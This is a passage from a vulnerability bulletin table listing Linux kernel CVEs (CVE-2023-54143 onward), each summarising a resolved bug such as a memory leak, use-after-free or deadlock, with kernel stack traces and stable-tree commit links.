https://git.kernel.org/stable/c/ce3aee7114c575fab32a5e9e939d4bbb3dcca79f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: mediatek: vcodec: fix resource leaks in vdec_msg_queue_init() If we encounter any error in the vdec_msg_queue_init() then we need to set "msg_queue->wdma_addr.size = 0;". Normally, this is done inside the vdec_msg_queue_deinit() function. However, if the first call to allocate &msg_queue->wdma_addr fails, then the vdec_msg_queue_deinit() function is a no-op. For that situation, just set the size to zero explicitly and return. There were two other error paths which did not clean up before returning. Change those error paths to goto mem_alloc_err. | 2025-12-24 | not yet calculated | CVE-2023-54143 | https://git.kernel.org/stable/c/858322c409e0aba8f70810d23f35c482744f007c https://git.kernel.org/stable/c/b7dbc27301f560c3b915235c53383155b3512083 https://git.kernel.org/stable/c/451dc187cadd47771e5d9434fe220fad7be84057 https://git.kernel.org/stable/c/cf10b0bb503c974ba049d6f888b21178be20a962 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Fix kernel warning during topology setup This patch fixes the following kernel warning seen during driver load by correctly initializing the p2plink attr before creating the sysfs file: [ +0.002865] ------------[ cut here ]------------ [ +0.002327] kobject: '(null)' (0000000056260cfb): is not initialized, yet kobject_put() is being called. [ +0.004780] WARNING: CPU: 32 PID: 1006 at lib/kobject.c:718 kobject_put+0xaa/0x1c0 [ +0.001361] Call Trace: [ +0.001234] <TASK> [ +0.001067] kfd_remove_sysfs_node_entry+0x24a/0x2d0 [amdgpu] [ +0.003147] kfd_topology_update_sysfs+0x3d/0x750 [amdgpu] [ +0.002890] kfd_topology_add_device+0xbd7/0xc70 [amdgpu] [ +0.002844] ? lock_release+0x13c/0x2e0 [ +0.001936] ? smu_cmn_send_smc_msg_with_param+0x1e8/0x2d0 [amdgpu] [ +0.003313] ? amdgpu_dpm_get_mclk+0x54/0x60 [amdgpu] [ +0.002703] kgd2kfd_device_init.cold+0x39f/0x4ed [amdgpu] [ +0.002930] amdgpu_amdkfd_device_init+0x13d/0x1f0 [amdgpu] [ +0.002944] amdgpu_device_init.cold+0x1464/0x17b4 [amdgpu] [ +0.002970] ? pci_bus_read_config_word+0x43/0x80 [ +0.002380] amdgpu_driver_load_kms+0x15/0x100 [amdgpu] [ +0.002744] amdgpu_pci_probe+0x147/0x370 [amdgpu] [ +0.002522] local_pci_probe+0x40/0x80 [ +0.001896] work_for_cpu_fn+0x10/0x20 [ +0.001892] process_one_work+0x26e/0x5a0 [ +0.002029] worker_thread+0x1fd/0x3e0 [ +0.001890] ? process_one_work+0x5a0/0x5a0 [ +0.002115] kthread+0xea/0x110 [ +0.001618] ? kthread_complete_and_exit+0x20/0x20 [ +0.002422] ret_from_fork+0x1f/0x30 [ +0.001808] </TASK> [ +0.001103] irq event stamp: 59837 [ +0.001718] hardirqs last enabled at (59849): [<ffffffffb30fab12>] __up_console_sem+0x52/0x60 [ +0.004414] hardirqs last disabled at (59860): [<ffffffffb30faaf7>] __up_console_sem+0x37/0x60 [ +0.004414] softirqs last enabled at (59654): [<ffffffffb307d9c7>] irq_exit_rcu+0xd7/0x130 [ +0.004205] softirqs last disabled at (59649): [<ffffffffb307d9c7>] irq_exit_rcu+0xd7/0x130 [ +0.004203] ---[ end trace 0000000000000000 ]--- | 2025-12-24 | not yet calculated | CVE-2023-54144 | https://git.kernel.org/stable/c/2d5a6742a242091292cc0a2b607be701a45d0c4e https://git.kernel.org/stable/c/306888b1246bf44e703b6f1ccc746c2746c1a981 https://git.kernel.org/stable/c/cf97eb7e47d4671084c7e114c5d88a3d0540ecbd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: drop unnecessary user-triggerable WARN_ONCE in verifierl log It's trivial for user to trigger "verifier log line truncated" warning, as verifier has a fixed-sized buffer of 1024 bytes (as of now), and there are at least two pieces of user-provided information that can be output through this buffer, and both can be arbitrarily sized by user: - BTF names; - BTF.ext source code lines strings. Verifier log buffer should be properly sized for typical verifier state output. But it's sort-of expected that this buffer won't be long enough in some circumstances. So let's drop the check. In any case code will work correctly, at worst truncating a part of a single line output. | 2025-12-24 | not yet calculated | CVE-2023-54145 | https://git.kernel.org/stable/c/40c88c429a598006f91ad7a2b89856cd50b3a008 https://git.kernel.org/stable/c/926a175026fed5d534f587ea4ec3ec49265cd3c5 https://git.kernel.org/stable/c/cff36398bd4c7d322d424433db437f3c3391c491 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/kexec: Fix double-free of elf header buffer After b3e34a47f989 ("x86/kexec: fix memory leak of elf header buffer"), freeing image->elf_headers in the error path of crash_load_segments() is not needed because kimage_file_post_load_cleanup() will take care of that later. And not clearing it could result in a double-free. Drop the superfluous vfree() call at the error path of crash_load_segments(). | 2025-12-24 | not yet calculated | CVE-2023-54146 | https://git.kernel.org/stable/c/4c71a552b97fb4f46eb300224434fe56fcf4f254 https://git.kernel.org/stable/c/554a880a1fff46dd5a355dec21cd77d542a0ddf2 https://git.kernel.org/stable/c/fbdbf8ac333d3d47c0d9ea81d7d445654431d100 https://git.kernel.org/stable/c/5bd3c7abeb69fb4133418b846a1c6dc11313d6f0 https://git.kernel.org/stable/c/d00dd2f2645dca04cf399d8fc692f3f69b6dd996 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: platform: mtk-mdp3: Add missing check and free for ida_alloc Add the check for the return value of the ida_alloc in order to avoid NULL pointer dereference. Moreover, free allocated "ctx->id" if mdp_m2m_open fails later in order to avoid memory leak. | 2025-12-24 | not yet calculated | CVE-2023-54147 | https://git.kernel.org/stable/c/51fc1880e47421ee7b192372e8e86b7bbba40776 https://git.kernel.org/stable/c/4c173a65a2b1cc0556c3f6f0bab82e4fdb449522 https://git.kernel.org/stable/c/22b72cad501fb75500cc60af4d92de3066fb6fc2 https://git.kernel.org/stable/c/d00f592250782538cda87745607695b0fe27dcd4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5e: Move representor neigh cleanup to profile cleanup_tx For IP tunnel encapsulation in ECMP (Equal-Cost Multipath) mode, as the flow is duplicated to the peer eswitch, the related neighbour information on the peer uplink representor is created as well. In the cited commit, eswitch devcom unpair is moved to uplink unload API, specifically the profile->cleanup_tx. If there is a encap rule offloaded in ECMP mode, when one eswitch does unpair (because of unloading the driver, for instance), and the peer rule from the peer eswitch is going to be deleted, the use-after-free error is triggered while accessing neigh info, as it is already cleaned up in uplink's profile->disable, which is before its profile->cleanup_tx. To fix this issue, move the neigh cleanup to profile's cleanup_tx callback, and after mlx5e_cleanup_uplink_rep_tx is called. The neigh init is moved to init_tx for symmeter. [ 2453.376299] BUG: KASAN: slab-use-after-free in mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core] [ 2453.379125] Read of size 4 at addr ffff888127af9008 by task modprobe/2496 [ 2453.381542] CPU: 7 PID: 2496 Comm: modprobe Tainted: G B 6.4.0-rc7+ #15 [ 2453.383386] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.13.0-0-gf21b5a4aeb02-prebuilt.qemu.org 04/01/2014 [ 2453.384335] Call Trace: [ 2453.384625] <TASK> [ 2453.384891] dump_stack_lvl+0x33/0x50 [ 2453.385285] print_report+0xc2/0x610 [ 2453.385667] ? __virt_addr_valid+0xb1/0x130 [ 2453.386091] ? mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core] [ 2453.386757] kasan_report+0xae/0xe0 [ 2453.387123] ? mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core] [ 2453.387798] mlx5e_rep_neigh_entry_release+0x109/0x3a0 [mlx5_core] [ 2453.388465] mlx5e_rep_encap_entry_detach+0xa6/0xe0 [mlx5_core] [ 2453.389111] mlx5e_encap_dealloc+0xa7/0x100 [mlx5_core] [ 2453.389706] mlx5e_tc_tun_encap_dests_unset+0x61/0xb0 [mlx5_core] [ 2453.390361] mlx5_free_flow_attr_actions+0x11e/0x340 [mlx5_core] [ 2453.391015] ? complete_all+0x43/0xd0 [ 2453.391398] ? free_flow_post_acts+0x38/0x120 [mlx5_core] [ 2453.392004] mlx5e_tc_del_fdb_flow+0x4ae/0x690 [mlx5_core] [ 2453.392618] mlx5e_tc_del_fdb_peers_flow+0x308/0x370 [mlx5_core] [ 2453.393276] mlx5e_tc_clean_fdb_peer_flows+0xf5/0x140 [mlx5_core] [ 2453.393925] mlx5_esw_offloads_unpair+0x86/0x540 [mlx5_core] [ 2453.394546] ? mlx5_esw_offloads_set_ns_peer.isra.0+0x180/0x180 [mlx5_core] [ 2453.395268] ? down_write+0xaa/0x100 [ 2453.395652] mlx5_esw_offloads_devcom_event+0x203/0x530 [mlx5_core] [ 2453.396317] mlx5_devcom_send_event+0xbb/0x190 [mlx5_core] [ 2453.396917] mlx5_esw_offloads_devcom_cleanup+0xb0/0xd0 [mlx5_core] [ 2453.397582] mlx5e_tc_esw_cleanup+0x42/0x120 [mlx5_core] [ 2453.398182] mlx5e_rep_tc_cleanup+0x15/0x30 [mlx5_core] [ 2453.398768] mlx5e_cleanup_rep_tx+0x6c/0x80 [mlx5_core] [ 2453.399367] mlx5e_detach_netdev+0xee/0x120 [mlx5_core] [ 2453.399957] mlx5e_netdev_change_profile+0x84/0x170 [mlx5_core] [ 2453.400598] mlx5e_vport_rep_unload+0xe0/0xf0 [mlx5_core] [ 2453.403781] mlx5_eswitch_unregister_vport_reps+0x15e/0x190 [mlx5_core] [ 2453.404479] ? mlx5_eswitch_register_vport_reps+0x200/0x200 [mlx5_core] [ 2453.405170] ? up_write+0x39/0x60 [ 2453.405529] ? kernfs_remove_by_name_ns+0xb7/0xe0 [ 2453.405985] auxiliary_bus_remove+0x2e/0x40 [ 2453.406405] device_release_driver_internal+0x243/0x2d0 [ 2453.406900] ? kobject_put+0x42/0x2d0 [ 2453.407284] bus_remove_device+0x128/0x1d0 [ 2453.407687] device_del+0x240/0x550 [ 2453.408053] ? waiting_for_supplier_show+0xe0/0xe0 [ 2453.408511] ? kobject_put+0xfa/0x2d0 [ 2453.408889] ? __kmem_cache_free+0x14d/0x280 [ 2453.409310] mlx5_rescan_drivers_locked.part.0+0xcd/0x2b0 [mlx5_core] [ 2453.409973] mlx5_unregister_device+0x40/0x50 [mlx5_core] [ 2453.410561] mlx5_uninit_one+0x3d/0x110 [mlx5_core] [ 2453.411111] remove_one+0x89/0x130 [mlx5_core] [ 24 ---truncated--- | 2025-12-24 | not yet calculated | CVE-2023-54148 | https://git.kernel.org/stable/c/d628ba98eb1637acce44001e04c718d8dbb1f7ce https://git.kernel.org/stable/c/36697c592cd0809e626df01b3644c23ac522a4d0 https://git.kernel.org/stable/c/d03b6e6f31820b84f7449cca022047f36c42bc3f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: dsa: avoid suspicious RCU usage for synced VLAN-aware MAC addresses When using the felix driver (the only one which supports UC filtering and MC filtering) as a DSA master for a random other DSA switch, one can see the following stack trace when the downstream switch ports join a VLAN-aware bridge: ============================= WARNING: suspicious RCU usage ----------------------------- net/8021q/vlan_core.c:238 suspicious rcu_dereference_protected() usage! stack backtrace: Workqueue: dsa_ordered dsa_slave_switchdev_event_work Call trace: lockdep_rcu_suspicious+0x170/0x210 vlan_for_each+0x8c/0x188 dsa_slave_sync_uc+0x128/0x178 __hw_addr_sync_dev+0x138/0x158 dsa_slave_set_rx_mode+0x58/0x70 __dev_set_rx_mode+0x88/0xa8 dev_uc_add+0x74/0xa0 dsa_port_bridge_host_fdb_add+0xec/0x180 dsa_slave_switchdev_event_work+0x7c/0x1c8 process_one_work+0x290/0x568 What it's saying is that vlan_for_each() expects rtnl_lock() context and it's not getting it, when it's called from the DSA master's ndo_set_rx_mode(). The caller of that - dsa_slave_set_rx_mode() - is the slave DSA interface's dsa_port_bridge_host_fdb_add() which comes from the deferred dsa_slave_switchdev_event_work(). We went to great lengths to avoid the rtnl_lock() context in that call path in commit 0faf890fc519 ("net: dsa: drop rtnl_lock from dsa_slave_switchdev_event_work"), and calling rtnl_lock() is simply not an option due to the possibility of deadlocking when calling dsa_flush_workqueue() from the call paths that do hold rtnl_lock() - basically all of them. So, when the DSA master calls vlan_for_each() from its ndo_set_rx_mode(), the state of the 8021q driver on this device is really not protected from concurrent access by anything. Looking at net/8021q/, I don't think that vlan_info->vid_list was particularly designed with RCU traversal in mind, so introducing an RCU read-side form of vlan_for_each() - vlan_for_each_rcu() - won't be so easy, and it also wouldn't be exactly what we need anyway. In general I believe that the solution isn't in net/8021q/ anyway; vlan_for_each() is not cut out for this task. DSA doesn't need rtnl_lock() to be held per se - since it's not a netdev state change that we're blocking, but rather, just concurrent additions/removals to a VLAN list. We don't even need sleepable context - the callback of vlan_for_each() just schedules deferred work. The proposed escape is to remove the dependency on vlan_for_each() and to open-code a non-sleepable, rtnl-free alternative to that, based on copies of the VLAN list modified from .ndo_vlan_rx_add_vid() and .ndo_vlan_rx_kill_vid(). | 2025-12-24 | not yet calculated | CVE-2023-54149 | https://git.kernel.org/stable/c/3948c69b3837fec2ee5a90fbc911c343199be0ac https://git.kernel.org/stable/c/3f9e79f31e51b7d5bf95c617540deb6cf2816a3f https://git.kernel.org/stable/c/d06f925f13976ab82167c93467c70a337a0a3cda |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd: Fix an out of bounds error in BIOS parser The array is hardcoded to 8 in atomfirmware.h, but firmware provides a bigger one sometimes. Deferencing the larger array causes an out of bounds error. commit 4fc1ba4aa589 ("drm/amd/display: fix array index out of bound error in bios parser") fixed some of this, but there are two other cases not covered by it. Fix those as well. | 2025-12-24 | not yet calculated | CVE-2023-54150 | https://git.kernel.org/stable/c/b8e7589f50b709b647b642531599e70707faf70c https://git.kernel.org/stable/c/66acfe798cd08b36cfbb65a30fab3159811304a7 https://git.kernel.org/stable/c/5675ecd2e0b00a4318ba1db1a1234e7d45b13d6b https://git.kernel.org/stable/c/dea2dbec716c38a0b73b6ad01d91e2b120cc5f1e https://git.kernel.org/stable/c/d116db180decec1b21bba31d2ff495ac4d8e1b83 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: f2fs: Fix system crash due to lack of free space in LFS When f2fs tries to checkpoint during foreground gc in LFS mode, system crash occurs due to lack of free space if the amount of dirty node and dentry pages generated by data migration exceeds free space. The reproduction sequence is as follows. - 20GiB capacity block device (null_blk) - format and mount with LFS mode - create a file and write 20,000MiB - 4k random write on full range of the file RIP: 0010:new_curseg+0x48a/0x510 [f2fs] Code: 55 e7 f5 89 c0 48 0f af c3 48 8b 5d c0 48 c1 e8 20 83 c0 01 89 43 6c 48 83 c4 28 5b 41 5c 41 5d 41 5e 41 5f 5d c3 cc cc cc cc <0f> 0b f0 41 80 4f 48 04 45 85 f6 0f 84 ba fd ff ff e9 ef fe ff ff RSP: 0018:ffff977bc397b218 EFLAGS: 00010246 RAX: 00000000000027b9 RBX: 0000000000000000 RCX: 00000000000027c0 RDX: 0000000000000000 RSI: 00000000000027b9 RDI: ffff8c25ab4e74f8 RBP: ffff977bc397b268 R08: 00000000000027b9 R09: ffff8c29e4a34b40 R10: 0000000000000001 R11: ffff977bc397b0d8 R12: 0000000000000000 R13: ffff8c25b4dd81a0 R14: 0000000000000000 R15: ffff8c2f667f9000 FS: 0000000000000000(0000) GS:ffff8c344ec80000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000c00055d000 CR3: 0000000e30810003 CR4: 00000000003706e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> allocate_segment_by_default+0x9c/0x110 [f2fs] f2fs_allocate_data_block+0x243/0xa30 [f2fs] ? __mod_lruvec_page_state+0xa0/0x150 do_write_page+0x80/0x160 [f2fs] f2fs_do_write_node_page+0x32/0x50 [f2fs] __write_node_page+0x339/0x730 [f2fs] f2fs_sync_node_pages+0x5a6/0x780 [f2fs] block_operations+0x257/0x340 [f2fs] f2fs_write_checkpoint+0x102/0x1050 [f2fs] f2fs_gc+0x27c/0x630 [f2fs] ? folio_mark_dirty+0x36/0x70 f2fs_balance_fs+0x16f/0x180 [f2fs] This patch adds checking whether free sections are enough before checkpoint during gc. [Jaegeuk Kim: code clean-up] | 2025-12-24 | not yet calculated | CVE-2023-54151 | https://git.kernel.org/stable/c/f4631d295ae3fff9e240ab78dc17f4b83d14f7bc https://git.kernel.org/stable/c/ce71c61d661cfac3f097af928995abfcebd2b8c5 https://git.kernel.org/stable/c/d11cef14f8146f3babd286c2cc8ca09c166295e2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: can: j1939: prevent deadlock by moving j1939_sk_errqueue() This commit addresses a deadlock situation that can occur in certain scenarios, such as when running data TP/ETP transfer and subscribing to the error queue while receiving a net down event. The deadlock involves locks in the following order: 3 j1939_session_list_lock -> active_session_list_lock j1939_session_activate ... j1939_sk_queue_activate_next -> sk_session_queue_lock ... j1939_xtp_rx_eoma_one 2 j1939_sk_queue_drop_all -> sk_session_queue_lock ... j1939_sk_netdev_event_netdown -> j1939_socks_lock j1939_netdev_notify 1 j1939_sk_errqueue -> j1939_socks_lock __j1939_session_cancel -> active_session_list_lock j1939_tp_rxtimer CPU0 CPU1 ---- ---- lock(&priv->active_session_list_lock); lock(&jsk->sk_session_queue_lock); lock(&priv->active_session_list_lock); lock(&priv->j1939_socks_lock); The solution implemented in this commit is to move the j1939_sk_errqueue() call out of the active_session_list_lock context, thus preventing the deadlock situation. | 2025-12-24 | not yet calculated | CVE-2023-54152 | https://git.kernel.org/stable/c/8a581b71cf686b4cd1a85c9c2dfc2fb88382c3b4 https://git.kernel.org/stable/c/ace6aa2ab5ba5869563ca689bbd912100514ae7b https://git.kernel.org/stable/c/f09ce9d765de1f064ce3919f57c6beb061744784 https://git.kernel.org/stable/c/d1366b283d94ac4537a4b3a1e8668da4df7ce7e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: turn quotas off if mount failed after enabling quotas Yi found during a review of the patch "ext4: don't BUG on inconsistent journal feature" that when ext4_mark_recovery_complete() returns an error value, the error handling path does not turn off the enabled quotas, which triggers the following kmemleak: ================================================================ unreferenced object 0xffff8cf68678e7c0 (size 64): comm "mount", pid 746, jiffies 4294871231 (age 11.540s) hex dump (first 32 bytes): 00 90 ef 82 f6 8c ff ff 00 00 00 00 41 01 00 00 ............A... c7 00 00 00 bd 00 00 00 0a 00 00 00 48 00 00 00 ............H... backtrace: [<00000000c561ef24>] __kmem_cache_alloc_node+0x4d4/0x880 [<00000000d4e621d7>] kmalloc_trace+0x39/0x140 [<00000000837eee74>] v2_read_file_info+0x18a/0x3a0 [<0000000088f6c877>] dquot_load_quota_sb+0x2ed/0x770 [<00000000340a4782>] dquot_load_quota_inode+0xc6/0x1c0 [<0000000089a18bd5>] ext4_enable_quotas+0x17e/0x3a0 [ext4] [<000000003a0268fa>] __ext4_fill_super+0x3448/0x3910 [ext4] [<00000000b0f2a8a8>] ext4_fill_super+0x13d/0x340 [ext4] [<000000004a9489c4>] get_tree_bdev+0x1dc/0x370 [<000000006e723bf1>] ext4_get_tree+0x1d/0x30 [ext4] [<00000000c7cb663d>] vfs_get_tree+0x31/0x160 [<00000000320e1bed>] do_new_mount+0x1d5/0x480 [<00000000c074654c>] path_mount+0x22e/0xbe0 [<0000000003e97a8e>] do_mount+0x95/0xc0 [<000000002f3d3736>] __x64_sys_mount+0xc4/0x160 [<0000000027d2140c>] do_syscall_64+0x3f/0x90 ================================================================ To solve this problem, we add a "failed_mount10" tag, and call ext4_quota_off_umount() in this tag to release the enabled qoutas. | 2025-12-24 | not yet calculated | CVE-2023-54153 | https://git.kernel.org/stable/c/c327b83c59ee938792a0300df646efac39c7d6a7 https://git.kernel.org/stable/c/deef86fa3005cbb61ae8aa5729324c09b3f4ba73 https://git.kernel.org/stable/c/77c3ca1108eb4a26db4f256c42b271a430cebc7d https://git.kernel.org/stable/c/d13f99632748462c32fc95d729f5e754bab06064 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: target: core: Fix target_cmd_counter leak The target_cmd_counter struct allocated via target_alloc_cmd_counter() is never freed, resulting in leaks across various transport types, e.g.: unreferenced object 0xffff88801f920120 (size 96): comm "sh", pid 102, jiffies 4294892535 (age 713.412s) hex dump (first 32 bytes): 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 38 01 92 1f 80 88 ff ff ........8....... backtrace: [<00000000e58a6252>] kmalloc_trace+0x11/0x20 [<0000000043af4b2f>] target_alloc_cmd_counter+0x17/0x90 [target_core_mod] [<000000007da2dfa7>] target_setup_session+0x2d/0x140 [target_core_mod] [<0000000068feef86>] tcm_loop_tpg_nexus_store+0x19b/0x350 [tcm_loop] [<000000006a80e021>] configfs_write_iter+0xb1/0x120 [<00000000e9f4d860>] vfs_write+0x2e4/0x3c0 [<000000008143433b>] ksys_write+0x80/0xb0 [<00000000a7df29b2>] do_syscall_64+0x42/0x90 [<0000000053f45fb8>] entry_SYSCALL_64_after_hwframe+0x6e/0xd8 Free the structure alongside the corresponding iscsit_conn / se_sess parent. | 2025-12-24 | not yet calculated | CVE-2023-54154 | https://git.kernel.org/stable/c/1cd41d1669bcbc5052afa897f85608a62ff3fb30 https://git.kernel.org/stable/c/f84639c5ac5f4f95b3992da1af4ff382ebf2e819 https://git.kernel.org/stable/c/d14e3e553e05cb763964c991fe6acb0a6a1c6f9c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: core: remove unnecessary frame_sz check in bpf_xdp_adjust_tail() Syzkaller reported the following issue: ======================================= Too BIG xdp->frame_sz = 131072 WARNING: CPU: 0 PID: 5020 at net/core/filter.c:4121 ____bpf_xdp_adjust_tail net/core/filter.c:4121 [inline] WARNING: CPU: 0 PID: 5020 at net/core/filter.c:4121 bpf_xdp_adjust_tail+0x466/0xa10 net/core/filter.c:4103 ... Call Trace: <TASK> bpf_prog_4add87e5301a4105+0x1a/0x1c __bpf_prog_run include/linux/filter.h:600 [inline] bpf_prog_run_xdp include/linux/filter.h:775 [inline] bpf_prog_run_generic_xdp+0x57e/0x11e0 net/core/dev.c:4721 netif_receive_generic_xdp net/core/dev.c:4807 [inline] do_xdp_generic+0x35c/0x770 net/core/dev.c:4866 tun_get_user+0x2340/0x3ca0 drivers/net/tun.c:1919 tun_chr_write_iter+0xe8/0x210 drivers/net/tun.c:2043 call_write_iter include/linux/fs.h:1871 [inline] new_sync_write fs/read_write.c:491 [inline] vfs_write+0x650/0xe40 fs/read_write.c:584 ksys_write+0x12f/0x250 fs/read_write.c:637 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd xdp->frame_sz > PAGE_SIZE check was introduced in commit c8741e2bfe87 ("xdp: Allow bpf_xdp_adjust_tail() to grow packet size"). But Jesper Dangaard Brouer <jbrouer@redhat.com> noted that after introducing the xdp_init_buff() which all XDP driver use - it's safe to remove this check. The original intend was to catch cases where XDP drivers have not been updated to use xdp.frame_sz, but that is not longer a concern (since xdp_init_buff). Running the initial syzkaller repro it was discovered that the contiguous physical memory allocation is used for both xdp paths in tun_get_user(), e.g. tun_build_skb() and tun_alloc_skb(). It was also stated by Jesper Dangaard Brouer <jbrouer@redhat.com> that XDP can work on higher order pages, as long as this is contiguous physical memory (e.g. a page). | 2025-12-24 | not yet calculated | CVE-2023-54155 | https://git.kernel.org/stable/c/a09c258cfa77d3ba0a7acc555c73eb6b005c4bd8 https://git.kernel.org/stable/c/20acffcdc2b74fb7dcc4e299f7aca173df89d911 https://git.kernel.org/stable/c/d9252d67ed2f921c230bba449ee051b5c32e4841 https://git.kernel.org/stable/c/d14eea09edf427fa36bd446f4a3271f99164202f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sfc: fix crash when reading stats while NIC is resetting efx_net_stats() (.ndo_get_stats64) can be called during an ethtool selftest, during which time nic_data->mc_stats is NULL as the NIC has been fini'd. In this case do not attempt to fetch the latest stats from the hardware, else we will crash on a NULL dereference: BUG: kernel NULL pointer dereference, address: 0000000000000038 RIP efx_nic_update_stats abridged calltrace: efx_ef10_update_stats_pf efx_net_stats dev_get_stats dev_seq_printf_stats Skipping the read is safe, we will simply give out stale stats. To ensure that the free in efx_ef10_fini_nic() does not race against efx_ef10_update_stats_pf(), which could cause a TOCTTOU bug, take the efx->stats_lock in fini_nic (it is already held across update_stats). | 2025-12-24 | not yet calculated | CVE-2023-54156 | https://git.kernel.org/stable/c/cb1aa7cc562cab6a87ea33574c8c65f2d2fd7aeb https://git.kernel.org/stable/c/91f4ef204e731565afdc6c2a7fcf509a3fd6fd67 https://git.kernel.org/stable/c/446f5567934331923d0aec4ce045e4ecb0174aae https://git.kernel.org/stable/c/470152d76b3ed107d172ea46acc4bfa941f20b4b https://git.kernel.org/stable/c/aba32b4c58112960c0c708703ca6b44dc8944082 https://git.kernel.org/stable/c/d1b355438b8325a486f087e506d412c4e852f37b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: binder: fix UAF of alloc->vma in race with munmap() [ cmllamas: clean forward port from commit 015ac18be7de ("binder: fix UAF of alloc->vma in race with munmap()") in 5.10 stable. It is needed in mainline after the revert of commit a43cfc87caaf ("android: binder: stop saving a pointer to the VMA") as pointed out by Liam. The commit log and tags have been tweaked to reflect this. ] In commit 720c24192404 ("ANDROID: binder: change down_write to down_read") binder assumed the mmap read lock is sufficient to protect alloc->vma inside binder_update_page_range(). This used to be accurate until commit dd2283f2605e ("mm: mmap: zap pages with read mmap_sem in munmap"), which now downgrades the mmap_lock after detaching the vma from the rbtree in munmap(). Then it proceeds to teardown and free the vma with only the read lock held. This means that accesses to alloc->vma in binder_update_page_range() now will race with vm_area_free() in munmap() and can cause a UAF as shown in the following KASAN trace: ================================================================== BUG: KASAN: use-after-free in vm_insert_page+0x7c/0x1f0 Read of size 8 at addr ffff16204ad00600 by task server/558 CPU: 3 PID: 558 Comm: server Not tainted 5.10.150-00001-gdc8dcf942daa #1 Hardware name: linux,dummy-virt (DT) Call trace: dump_backtrace+0x0/0x2a0 show_stack+0x18/0x2c dump_stack+0xf8/0x164 print_address_description.constprop.0+0x9c/0x538 kasan_report+0x120/0x200 __asan_load8+0xa0/0xc4 vm_insert_page+0x7c/0x1f0 binder_update_page_range+0x278/0x50c binder_alloc_new_buf+0x3f0/0xba0 binder_transaction+0x64c/0x3040 binder_thread_write+0x924/0x2020 binder_ioctl+0x1610/0x2e5c __arm64_sys_ioctl+0xd4/0x120 el0_svc_common.constprop.0+0xac/0x270 do_el0_svc+0x38/0xa0 el0_svc+0x1c/0x2c el0_sync_handler+0xe8/0x114 el0_sync+0x180/0x1c0 Allocated by task 559: kasan_save_stack+0x38/0x6c __kasan_kmalloc.constprop.0+0xe4/0xf0 kasan_slab_alloc+0x18/0x2c kmem_cache_alloc+0x1b0/0x2d0 vm_area_alloc+0x28/0x94 mmap_region+0x378/0x920 do_mmap+0x3f0/0x600 vm_mmap_pgoff+0x150/0x17c ksys_mmap_pgoff+0x284/0x2dc __arm64_sys_mmap+0x84/0xa4 el0_svc_common.constprop.0+0xac/0x270 do_el0_svc+0x38/0xa0 el0_svc+0x1c/0x2c el0_sync_handler+0xe8/0x114 el0_sync+0x180/0x1c0 Freed by task 560: kasan_save_stack+0x38/0x6c kasan_set_track+0x28/0x40 kasan_set_free_info+0x24/0x4c __kasan_slab_free+0x100/0x164 kasan_slab_free+0x14/0x20 kmem_cache_free+0xc4/0x34c vm_area_free+0x1c/0x2c remove_vma+0x7c/0x94 __do_munmap+0x358/0x710 __vm_munmap+0xbc/0x130 __arm64_sys_munmap+0x4c/0x64 el0_svc_common.constprop.0+0xac/0x270 do_el0_svc+0x38/0xa0 el0_svc+0x1c/0x2c el0_sync_handler+0xe8/0x114 el0_sync+0x180/0x1c0 [...] ================================================================== To prevent the race above, revert back to taking the mmap write lock inside binder_update_page_range(). One might expect an increase of mmap lock contention. However, binder already serializes these calls via top level alloc->mutex. Also, there was no performance impact shown when running the binder benchmark tests. | 2025-12-24 | not yet calculated | CVE-2023-54157 | https://git.kernel.org/stable/c/1bb8a65190d45cd5c7dbc85e29b9102110cd6be6 https://git.kernel.org/stable/c/931ea1ed31be939c1efdbc49bc66d2a45684f9b4 https://git.kernel.org/stable/c/ca0cc0a9c6e56c699e2acbb93d8024523021f3c3 https://git.kernel.org/stable/c/d1d8875c8c13517f6fd1ff8d4d3e1ac366a17e07 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: don't free qgroup space unless specified Boris noticed in his simple quotas testing that he was getting a leak with Sweet Tea's change to subvol create that stopped doing a transaction commit. This was just a side effect of that change. In the delayed inode code we have an optimization that will free extra reservations if we think we can pack a dir item into an already modified leaf. Previously this wouldn't be triggered in the subvolume create case because we'd commit the transaction, it was still possible but much harder to trigger. It could actually be triggered if we did a mkdir && subvol create with qgroups enabled. This occurs because in btrfs_insert_delayed_dir_index(), which gets called when we're adding the dir item, we do the following: btrfs_block_rsv_release(fs_info, trans->block_rsv, bytes, NULL); if we're able to skip reserving space. The problem here is that trans->block_rsv points at the temporary block rsv for the subvolume create, which has qgroup reservations in the block rsv. This is a problem because btrfs_block_rsv_release() will do the following: if (block_rsv->qgroup_rsv_reserved >= block_rsv->qgroup_rsv_size) { qgroup_to_release = block_rsv->qgroup_rsv_reserved - block_rsv->qgroup_rsv_size; block_rsv->qgroup_rsv_reserved = block_rsv->qgroup_rsv_size; } The temporary block rsv just has ->qgroup_rsv_reserved set, 